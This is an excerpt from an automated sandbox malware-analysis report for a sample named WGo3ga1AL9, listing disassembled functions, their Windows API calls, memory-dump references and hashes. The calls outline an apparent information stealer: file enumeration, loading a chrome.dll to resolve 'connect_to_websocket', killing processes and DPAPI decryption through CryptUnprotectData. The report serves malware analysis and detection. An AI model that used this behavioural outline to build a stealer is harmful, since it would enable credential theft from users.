                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 1415058207-1173974218
                                                                                                                                              • Opcode ID: 4b371a712be24b48d24eba15e49b59100a730691e31a57a2743ff0fac32c7f02
                                                                                                                                              • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                                                                                                                              • Opcode Fuzzy Hash: 4b371a712be24b48d24eba15e49b59100a730691e31a57a2743ff0fac32c7f02
                                                                                                                                              • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                                                                                                                              Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DECC
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                              • Opcode ID: 46cdc5a41241fad738e0c8b53fbfe7511efa684ef974510eb7e2e954daec0b57
                                                                                                                                              • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                                                                                                                              • Opcode Fuzzy Hash: 46cdc5a41241fad738e0c8b53fbfe7511efa684ef974510eb7e2e954daec0b57
                                                                                                                                              • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                                                                                                                              Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                                                                                                                              • GetProcAddress.KERNEL32(6CFB0000,connect_to_websocket), ref: 0040A0BE
                                                                                                                                              • GetProcAddress.KERNEL32(6CFB0000,free_result), ref: 0040A0D5
                                                                                                                                              • FreeLibrary.KERNEL32(6CFB0000,?,004108E4), ref: 0040A0F9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryProc$FreeLoad
                                                                                                                                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                                                                                                                              • API String ID: 2256533930-1545816527
                                                                                                                                              • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                                                                                                                              • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                                                                                                                              • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                                                                                                                              • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                                                                                                                              Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                                                                                                                              • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                                                                                                                              • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00419987
                                                                                                                                              • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2696918072-0
                                                                                                                                              • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                                                                                                                              • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                                                                                                                              • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                                                                                                                              • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                                                                                                                              Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                              • String ID: \*.*$@
                                                                                                                                              • API String ID: 433455689-2355794846
                                                                                                                                              • Opcode ID: 7b522b8ee7470cecd3616953b02640cce0f3825fa3b00f9208a78d55e0682fd0
                                                                                                                                              • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                                                                                                                              • Opcode Fuzzy Hash: 7b522b8ee7470cecd3616953b02640cce0f3825fa3b00f9208a78d55e0682fd0
                                                                                                                                              • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                                                                                                                              Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                              • String ID: /
                                                                                                                                              • API String ID: 3090951853-4001269591
                                                                                                                                              • Opcode ID: ee59266b1147c1458ccc183c5cf63c1da5678ccc7221547f975effd1a4e4f03b
                                                                                                                                              • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                                                                                                                              • Opcode Fuzzy Hash: ee59266b1147c1458ccc183c5cf63c1da5678ccc7221547f975effd1a4e4f03b
                                                                                                                                              • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                                                                                                                              Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                                                                                                                              • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                                                                                                                              • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                                                                                                                              • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                              • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                                                                                                                              • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                                                                                                                              • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                                                                                                                              • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                                                                                                                              Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                                                                                                                              • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                                                                                                                              • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004188F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1066202413-0
                                                                                                                                              • Opcode ID: 4f4818c5c7ea23974698837c0896f910c8da8c0dbaffe5977bc5f749f5db01ba
                                                                                                                                              • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                                                                                                                              • Opcode Fuzzy Hash: 4f4818c5c7ea23974698837c0896f910c8da8c0dbaffe5977bc5f749f5db01ba
                                                                                                                                              • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                                                                                                                              Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 80407269-0
                                                                                                                                              • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                                                                                                                              • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                                                                                                                              • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                                                                                                                              • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                                                                                                                              Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040A323
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
